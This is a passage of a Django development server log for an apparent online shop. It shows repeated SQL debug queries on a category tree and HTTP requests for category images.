"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:27:44,153 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:27:44,156 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:27:44,159 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:27:44,161 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:27:44,163 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:27:44,165 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:27:44,169 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:27:44,171 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:27:44,173 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:27:44,176 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:27:44,178 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:27:44,182 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:27:44,184 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:27:44,186 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:27:44,189 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:27:44,191 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:27:44,193 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:27:44,197 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:27:44,200 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:27:44,203 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:27:44,206 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:27:44,208 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:27:44,211 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:27:44,214 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:27:44,216 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:27:44,218 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:27:44,220 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:27:44,224 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:27:44,226 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:27:44,229 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:27:44,231 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:27:44,233 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:27:44,236 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:27:44,239 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:27:44,241 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:27:44,244 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:27:44,247 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:27:44,249 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:27:44] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:27:45] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 12:27:45] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [19/Dec/2019 12:27:45] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:27:45] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:27:45] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 12:27:45] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [19/Dec/2019 12:27:48] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [19/Dec/2019 12:27:48] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 12:27:52] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 12:27:52] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [19/Dec/2019 12:27:53] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 12:27:54] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [19/Dec/2019 12:27:57] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 12:27:58] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 12:27:59] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [19/Dec/2019 12:27:59] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [19/Dec/2019 12:28:00] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 12:28:02] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 12:28:04] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [19/Dec/2019 12:28:05] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [19/Dec/2019 12:28:06] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [19/Dec/2019 12:28:09] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [19/Dec/2019 12:28:10] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 12:28:10] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 12:28:11] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [19/Dec/2019 12:28:13] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [19/Dec/2019 12:28:13] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [19/Dec/2019 12:28:14] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [19/Dec/2019 12:28:16] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 12:28:16] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [19/Dec/2019 12:28:16] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [19/Dec/2019 12:28:16] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [19/Dec/2019 12:28:19] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 12:28:19] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 12:28:20] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [19/Dec/2019 12:28:20] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [19/Dec/2019 12:28:21] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [19/Dec/2019 12:28:24] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [19/Dec/2019 12:28:24] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 12:28:25] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 12:28:26] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [19/Dec/2019 12:28:28] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [19/Dec/2019 12:28:29] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 12:28:29] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 12:28:31] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 [19/Dec/2019 12:28:43] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 12:32:32,562 utils 4252 140031747061504 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:32:32,568 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:32:32,572 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:32:32,574 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:32:32,579 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:32:32,581 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:32:32,584 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:32:32,587 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:32:32,589 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:32:32,592 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:32:32,594 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:32:32,597 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:32:32,599 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:32:32,601 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:32:32,604 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:32:32,607 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:32:32,609 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:32:32,611 utils 4252 140031747061504 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 